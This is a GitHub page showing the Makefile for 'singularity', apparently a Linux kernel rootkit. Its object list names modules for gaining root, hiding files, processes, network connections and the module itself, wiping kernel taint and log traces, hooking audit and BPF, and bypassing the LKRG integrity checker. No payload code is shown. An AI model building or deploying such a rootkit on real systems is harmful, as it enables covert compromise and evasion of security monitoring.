-
Notifications
You must be signed in to change notification settings - Fork 179
Expand file tree
/
Copy pathMakefile
More file actions
28 lines (25 loc) · 745 Bytes
/
Makefile
File metadata and controls
28 lines (25 loc) · 745 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
obj-m += singularity.o
singularity-objs := main.o \
modules/reset_tainted.o \
modules/become_root.o \
modules/hiding_directory.o \
modules/hiding_tcp.o \
modules/clear_taint_dmesg.o \
modules/hidden_pids.o \
modules/hiding_stat.o \
modules/hooks_write.o \
modules/hiding_chdir.o \
modules/hiding_readlink.o \
modules/open.o \
modules/bpf_hook.o \
modules/icmp.o \
modules/audit.o \
modules/task.o \
modules/lkrg_bypass.o \
modules/sysrq_hook.o \
modules/selfdefense.o \
modules/hide_module.o modules/trace.o ftrace/ftrace_helper.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean